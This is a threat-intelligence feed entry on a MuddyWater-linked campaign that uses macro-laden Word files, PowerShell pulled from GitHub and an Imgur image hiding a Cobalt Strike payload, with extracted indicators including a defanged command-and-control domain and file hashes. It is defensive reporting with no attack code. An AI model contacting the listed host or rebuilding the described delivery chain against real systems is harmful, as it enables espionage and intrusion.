Threats Feed|MuddyWater|Last Updated 30/05/2025|AuthorCertfa Radar|Publish Date28/12/2020

MuddyWater APT Group Linked to Steganography-Based Malware Attack

  • Actor Motivations: Espionage,Exfiltration
  • Attack Vectors: Downloader,Dropper,Malicious Macro,RAT
  • Attack Complexity: Medium
  • Threat Risk: Unknown

Threat Overview

A new malware strain, potentially linked to the MuddyWater APT group, uses Word files with macros to deploy PowerShell scripts from GitHub, which then download an image from Imgur. The image's pixel values decode a Cobalt Strike payload. This method, involving steganography, enables attackers to execute commands and establish remote control over Windows systems. The attack primarily targets Middle Eastern entities, using phishing emails to distribute malicious Word documents.

Detected Targets

TypeDescriptionConfidence
RegionMiddle East Countries
High

Extracted IOCs

  • mazzion1234-44451.portmap[.]host
  • 97b5ca432a34b919a59fe8bc8e213fc3
  • a9506c371418969ea5084b00db54573b
  • 1fb678ab15f3c311d7189d4c80bc7c91bc360e49
  • 6774f7b5e533a4158b2b2375cf06fbc95e434526
  • d1c7a7511bd09b53c651f8ccc43e9c36ba80265ba11164f88d6863f0832d8f81
  • ed93ce9f84dbea3c070b8e03b82b95eb0944c44c6444d967820a890e8218b866
download

Tip: 7 related IOCs (0 IP, 1 domain, 0 URL, 0 email, 6 file hash) to this threat have been found.

FAQs

Malware Hiding in Plain Sight: GitHub, Imgur, and Stealthy Attacks

A sophisticated malware campaign used Word documents with macros to run malicious scripts that downloaded a hidden attack payload from a seemingly harmless image on Imgur.

The campaign is believed to be linked to MuddyWater, a known government-backed hacking group that has previously targeted organizations in the Middle East.

The attackers aimed to secretly install a remote access tool (Cobalt Strike) that allows full control of infected computers for spying, data theft, or further attacks.

Victims were tricked into opening Word documents. These documents executed scripts that pulled an image from Imgur. Hidden inside the image’s pixels was code that activated the attack.

While no specific victims were named, the methods and suspected actor suggest targets of interest were likely in the Middle East, including government or strategic sectors.

Because they are trusted platforms, using them helps attackers hide in normal traffic and avoid raising alarms in security systems.

Avoid opening suspicious Word documents, especially those prompting to enable macros. Keep security tools updated and monitor for unusual activity like PowerShell scripts contacting external servers.

It appears to be a targeted attack, but the techniques used could be replicated by others, making it a broader concern for any organization handling sensitive data.